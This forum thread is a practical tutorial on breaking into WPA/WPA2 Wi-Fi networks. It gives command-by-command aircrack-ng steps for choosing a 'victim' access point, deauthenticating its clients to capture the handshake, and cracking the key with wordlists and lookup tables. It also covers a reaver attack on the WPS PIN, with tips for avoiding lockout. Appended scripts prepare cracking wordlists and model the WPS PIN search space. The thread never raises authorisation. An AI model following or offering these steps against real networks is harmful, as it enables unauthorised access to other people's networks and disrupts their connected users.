How to crack WPA/WPA2 secured wireless networks


Post by Sethioz »

Update (15-aug-2013)
This post is very old and I have done this many times by now.
The most important note I have to bring out is that getting the handshake is not easy: it only works if you have a very good signal, and it's common that you don't get the handshake if you deauth the client.
Also, I have used Elcomsoft Distributed Password Recovery to launch a brute-force attack against a WPA2 handshake using 10 computers, and was able to crack an 8-digit lower-alpha key in a week.

How to patch zydas 1211 / zd1211 chipset in order to get injection working < I don't think this is necessary anymore, as BackTrack 5 R3 supports most adapters now.

UPDATE - this is a very important security update. It is now possible to intercept WPA TKIP traffic. This means that you can crack the traffic and see what's going on; it is not possible to get the key yet, but you can see the traffic. I have not yet tested it because of a lack of networks: I have only one WPA/TKIP in range and nobody home there.
It is possible to use the "tkiptun-ng" tool, which has been added to the latest aircrack-ng suite.
Read more there (if the link is broken, post a reply and report it) >

First, you can't really do this in Windows at all; maybe on some specific wireless adapters you can. You need to set your wireless adapter to rfmon mode (monitor mode), and this becomes a problem in Windows because there are no drivers for that, so your best choice is Linux.
I suggest you download the BackTrack 4 live CD and run that instead, so you don't have to install anything.
In BackTrack 4 you have all the tools needed. If you do this on another Linux, get the aircrack-ng suite (use the Synaptic package manager or Google).
Note that for WPA cracking you need somebody to be connected to the access point! Otherwise don't even bother.

1. Open a terminal and let's get started.

    airmon-ng start wlan0
wlan0 < this is your wireless adapter's interface (may be different from mine)
Now it says that monitor mode has been enabled on mon0 (also may be different).

2. Now let's run airodump to scope out a victim.

    airodump-ng mon0
Choose your victim from there and stop it by pressing CTRL+C while the terminal is focused (active).

3. Now we need to monitor and save the packets from your victim:

    airodump-ng -c 1 --bssid 00:00:00:00:00:00 -w packets mon0
-c < this is the channel; if "-c" does not work, then use "--channel"
--bssid < MAC address of your victim's wireless access point
-w < option to save packets (where "packets" is the name of the save file you want to create)
mon0 < your monitor interface

Now we need a handshake between client and access point; there are 2 ways to get it. You can either wait until somebody logs in, or you can deauthenticate the logged-in client (user). If you decide to wait, then skip to step 5; if you want it the faster and slightly harder way, then follow the next step.

4. Here we are going to deauthenticate the logged-in client

    aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 11:11:11:11:11:11 mon0
-0 < deauthentication attack (where 1 is the number of deauths to send)
-a < MAC address of your victim (access point)
-c < MAC address of the connected client you want to deauthenticate
mon0 < your monitor interface

Now in your airodump window it shows "WPA handshake: 00:00:00:00:00:00".

5. Now the longest part, the cracking. There are many different tools and methods you can use here, and you can also do this process on Windows. You can now close your capture (airodump).

- aircrack-ng (you already have it if you got this far)
You can run this directly from your terminal.

    aircrack-ng -w wordlist -b 00:00:00:00:00:00 packets-01.cap
-w < specify the wordlist you want to use (yes, you need a wordlist to attack the key)
-b < MAC address of your victim (access point, because there may be more handshakes in the captured packets file)
packets-01.cap < the file you created in step 3 (airodump-ng appends -01 to the name given with -w; .cap is the capture file extension)

- EWSA (Elcomsoft Wireless Security Auditor) - now this tool is quite good; it can run brute-force and wordlist attacks and it uses CPU + GPU (graphics processing unit < your video/graphics card) to crack, and as a result the crack speed is about 30 times faster. However, it is hard to find a working crack and there is no way I'd buy this program.

- Cain - this used to be my favorite tool for MD5 hash cracking, however it is quite slow against WPA. You can extract the handshake directly from a .cap file using Cain; it supports brute-force and wordlist attacks, however the attack speed is like 200 p/s (passwords per second) using my 2.8 GHz dual-core CPU. Cain does not support GPU cracking.

- cowpatty - I have never used it myself, but it supports the so-called "WPA rainbow tables" (lookup tables). This kind of attack is far faster; they say it can go through 150000 passwords per second, but you need the "lookup tables" for that. cowpatty also supports other types of attacks, but they are slow of course.

I just tested cowpatty with the WPA lookup tables; it's amazing how fast this is. Here are the results:

    996359 passphrases tested in 9.91 seconds:  100581.36 passphrases/second
The SSID (access point name) is CaSe SeNsItIVE. What it means is that I used one lookup table containing passphrases for "WLAN-AP".
In the first test the AP was called "WLAN-AP" and it was cracked successfully.
In the second test the AP was named "wlan-ap" and the password (key) was not found using the same lookup table.

Some useful info:

WPA lookup tables
About WPA rainbow tables < the torrent links don't work there, so don't bother.
How to crack password hashes < my own guide; useful stuff on how to make a wordlist and more.
I will make a video tutorial once I get the chance. I have no WPA-protected networks in range which I could crack; maybe I could get a few, but I can't be bothered to move my dish antenna. Also, the next problem would be connected clients: I did a scan once and couldn't see any connected clients.

How to generate a lookup table:
You can use genpmk (included in cowpatty) to generate a lookup table using a fixed SSID (AP name), but it's quite slow, about 1000 p/s generation speed.

Pyrit - never used it, but this tool seems to use GPU power again; this tool uses it to generate the lookup tables instead. This can be a lot faster than using genpmk to generate the tables.

Special thanks to Suicidal Looney for the SSID testing.

I edited this part because I managed to sort this error out, so I removed it completely (useless).
Now, how to use genpmk: there is a very important thing for you to know!
When you make your wordlist in Windows, it will not work!
Why?
Windows uses "0D 0A" as the newline, but you only need "0A" as the newline.
Huh?
Yes, use a hex editor to see what I'm talking about; I suggest you use XVI32. If you want to convert any wordlist, then simply open it in XVI32, then use the "replace" feature, there choose replace hex and replace "0D 0A" with "0A", save the file and you are done. Also DO NOT save it as .txt, because it may screw it up again. Use 'save as...' and save it as 'file' (without extension).
This method worked just fine for me.

I have included the .cap files with 2 different SSIDs. Both use "verwarnter" as the key/password.
This is for people who want to test out the cracking process only.
You can also use those .cap files to test your generated PMK lookup tables.

I have tested the genpmk tool a little bit; it can append to the current lookup tables. So if somebody is interested and has some wordlists of his own, like in some other language maybe, and wants to append to the current ones, then let's make a project out of it.
It would really help if somebody has access to a cluster.

There is also one idea circling in my head, maybe it's crazy, maybe not. I've been thinking whether it's possible to merge 2 of those lookup tables with only a hex editor or Raptor or any other tool that can just merge files. I will certainly test and update. If that's possible, then every person who is interested in this can make his own small lookup tables and attach them to the posts here, then I can merge all of them, creating a massive lookup table with lots and lots of words in it. If even 10 people could help me out by generating those, it would be very good already.
Please reply if you are even slightly interested in this project; I can give the exact details of how to use genpmk (it's quite well written here already anyway). Well, what you need to know is how to make it with the right SSID and the "0D 0A" problem described above.
Successfully cracking a WPA/WPA2 network in an uncontrolled environment can be quite hard, especially if the user has a strong key, but not if all the people who are interested in that would team up.
Right now I'm generating a lookup table for "wlan-ap" using 8-16 character words in the list. This wordlist is available in my downloads > others section and it's called 4-16; there is no point in using that as-is, so I took out all words shorter than 8 (WPA/WPA2 allows 8-63 chars only).
Once the lookup table is done, I will post the generation time here. So far it's been running for about 4-5 hours and has done nearly 1 million; there are around 4 million words in that list.

My results:
CPU 2.8 GHz dual core > 300 p/s
nVidia 9500GT 512 MB, 650 or 750 MHz core clock > 7500 p/s
Those results can change; with the CPU it can be from 200-400 and with the GPU it can be from 6000-8500. It all depends on temperature, resource usage, etc.

It took me about 14 h to generate a lookup table from about 3.4 million words. The size of the table is 139 MB.

Lookup table merging works fine. You can generate 2 separate lookup tables and then merge them with a hex editor (I used XVI32).
Attachment: cap files.rar
wlan-ap_lower.cap - wlan-ap as SSID
Both use verwarnter as the password.
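The two wordlist preparation steps the post describes for genpmk (turning the Windows "0D 0A" line ending into "0A", and throwing out words outside the 8-63 character range WPA allows) as one small POSIX shell script, with a check you can run before starting a multi-hour generation. This is an added example, not code from the post or from the cowpatty/aircrack-ng projects; the function names count_cr, prep_wordlist and wordlist_stats are my own, and the Windows-style input list the demo builds is constructed for the demo, not a real wordlist.

```shell
#!/bin/sh
# Added example (not from the post): clean a wordlist for genpmk / aircrack-ng.
# count_cr, prep_wordlist and wordlist_stats are hypothetical helper names.
set -u

# count_cr FILE: number of 0x0D (CR) bytes in FILE. 0 means the list already
# uses 0x0A-only line endings, which is what genpmk expects.
count_cr() {
    tr -cd '\r' < "$1" | wc -c | tr -d ' '
}

# prep_wordlist IN OUT: strip every CR (the XVI32 "0D 0A" -> "0A" replace, done
# in one command), keep only candidates of 8..63 bytes (the WPA passphrase
# range, so nothing outside it wastes PMK computation), and drop duplicates.
# LC_ALL=C makes awk's length() count bytes, which is what the WPA limit is.
prep_wordlist() {
    LC_ALL=C tr -d '\r' < "$1" \
        | LC_ALL=C awk 'length($0) >= 8 && length($0) <= 63' \
        | LC_ALL=C sort -u > "$2"
}

# wordlist_stats FILE: print "<lines> <shortest> <longest>" so you can check
# the result before feeding it to genpmk (expect shortest >= 8, longest <= 63).
wordlist_stats() {
    LC_ALL=C awk '
        NR == 1 { min = max = length($0) }
        { l = length($0); if (l < min) min = l; if (l > max) max = l }
        END { print NR + 0, min + 0, max + 0 }' "$1"
}

# Self-contained demo on a constructed Windows-style (CRLF) list: one word too
# short, a duplicate, a valid 8-byte word and a 64-byte line (one over the max).
demo_dir=$(mktemp -d)
printf 'short\r\nverwarnter\r\nverwarnter\r\nabcdefgh\r\n' > "$demo_dir/win.txt"
printf '%064d\r\n' 0 | tr 0 a >> "$demo_dir/win.txt"

echo "CR bytes before: $(count_cr "$demo_dir/win.txt")"      # 5
prep_wordlist "$demo_dir/win.txt" "$demo_dir/clean"
echo "CR bytes after:  $(count_cr "$demo_dir/clean")"        # 0
echo "lines min max:   $(wordlist_stats "$demo_dir/clean")"  # 2 8 10
cat "$demo_dir/clean"                                        # abcdefgh, verwarnter
rm -rf "$demo_dir"
```

Point genpmk's dictionary option (-f) at the OUT file; if count_cr on it prints anything other than 0, the list still has Windows line endings and the run will be wasted.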

Re: How to crack WPA/WPA2 secured wireless networks

Post by Sethioz »

I have found a new way to crack WPA/WPA2 networks. Not all APs are vulnerable, but for the ones that are, the success rate is 100%; however it takes a lot longer than WEP cracking. There is that new technology called WPS (Wi-Fi Protected Setup / System). It has a vulnerability in it: it's possible to crack the PIN, which is a lot easier to crack than the WPA/WPA2 pass itself.
It takes about 1-4 days, depending on the router and signal strength.

There is a tool called "reaver" that can attack the WPS system. I won't post any links, because those numbnutted brainmonkeys always change shit and I don't want any dead links on my forum, so just Google it (or use the included version, it might be out of date though).

I have tested a few times and I strongly recommend using a delay (-d option) with at least a 10 second delay, so add

    -d 10
The default is 1, but it is too fast; I locked one station's WPS like that. I don't know if it's permanent though; it might unlock itself after some time, but nowadays routers crash a lot, so most likely sooner or later it will get unlocked, but I still recommend not taking the risk. I went down to 8 though and it seems to be working fine, but I don't want to increase it either. It's a bit slow though: 3-4 hours and only 3.5% done.
The good thing is that it saves the session and you can continue it.

NOTE - as of BackTrack 5 R3, reaver is already pre-installed, so obtain a copy of BT5R3 and you're good to go.

How to install reaver on BackTrack 5 (BT5)

    ./configure --prefix=/usr
    make
    make install
How to find out if a station is vulnerable?
- reaver includes a tool called walsh / wash. It depends on the version of reaver; the one included here uses wash.

Simply use the following command:

    wash -i mon0 -C
-C is not needed, but in case you get a bad FCS error you should use -C.
I'm quite new to this and I don't know if using -C has any downsides, but I don't see it do any harm, so use it with -C.

I have successfully cracked 2 APs protected with a WPA2-PSK key which is 8-digit UPPER alpha + numbers. If you were to capture the handshake and try to brute-force it, then on a single machine it would take about 5-10 years, depending on the machine. I have a 3.6 GHz quad core with a 2 GB GTX 550 and it would take me 7 years, while using this WPS method it took me 3 days to crack 2 keys.
Attachment: BT5 testbox [Running] - Oracle VM VirtualBox_2012-05-14_01-26-18.jpg (screenshot)
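Why the WPS PIN is so much cheaper to attack than the passphrase, as an added example that is not from the post or from reaver. It relies on two facts about the WPS protocol the post does not spell out: the registrar confirms the first four and the last three digits of the eight-digit PIN separately, and the eighth digit is a checksum of the other seven, so an attacker needs at most 10^4 + 10^3 = 11000 online guesses instead of 10^8. The function names wps_checksum, wps_pin_valid, wps_search_space and wps_worst_case_hours are my own; the time estimate multiplies the guess count by the reaver -d delay only and ignores the time each exchange itself takes, so real runs are slower, which is consistent with the days the post reports.

```shell
#!/bin/sh
# Added example (not from the post or from reaver): WPS PIN checksum and the
# size of the PIN search space. Function names are hypothetical.
set -u

# wps_checksum PREFIX7: checksum digit for a 7-digit PIN prefix.
# Digits in positions 1,3,5,7 are weighted 3, positions 2,4,6 are weighted 1;
# the checksum digit makes the weighted sum a multiple of 10.
wps_checksum() {
    p=$(printf '%s' "$1" | sed 's/^0*//')   # drop leading zeros: no octal surprise
    [ -z "$p" ] && p=0
    accum=0
    while [ "$p" -gt 0 ]; do
        accum=$((accum + 3 * (p % 10))); p=$((p / 10))   # odd position from the right
        accum=$((accum + p % 10));       p=$((p / 10))   # even position
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# wps_pin_valid PIN8: exit 0 if PIN8 is eight digits whose last digit is the
# checksum of the first seven, else exit 1.
wps_pin_valid() {
    pin=$1
    [ "${#pin}" -eq 8 ] || return 1
    case $pin in *[!0-9]*) return 1 ;; esac
    prefix=${pin%?}
    last=${pin#"$prefix"}
    [ "$last" -eq "$(wps_checksum "$prefix")" ]
}

# wps_search_space: maximum number of online guesses when the two halves of
# the PIN are confirmed separately and the last digit is derived:
# 10^4 for the first half plus 10^3 for the second half.
wps_search_space() {
    echo $((10000 + 1000))
}

# wps_worst_case_hours DELAY_SECONDS: hours to exhaust the search space if each
# guess cost only the reaver -d delay (integer hours; real runs take longer).
wps_worst_case_hours() {
    echo $(( $(wps_search_space) * $1 / 3600 ))
}

# Stand-alone demo
for prefix in 1234567 0123456 9999999; do
    echo "prefix $prefix -> PIN $prefix$(wps_checksum "$prefix")"
done
wps_pin_valid 12345670 && echo "12345670 passes the checksum"
wps_pin_valid 12345671 || echo "12345671 is rejected by the checksum"
echo "worst case with -d 10: $(wps_worst_case_hours 10) hours"   # 30
```

Only PINs that pass wps_pin_valid are worth sending, which is why reaver never has to try anything close to the hundred million combinations an eight-digit number suggests; the 11000 worst case at ten seconds per guess is about 30 hours, before the time the M1..M6 exchange and the lockouts the post mentions add on top.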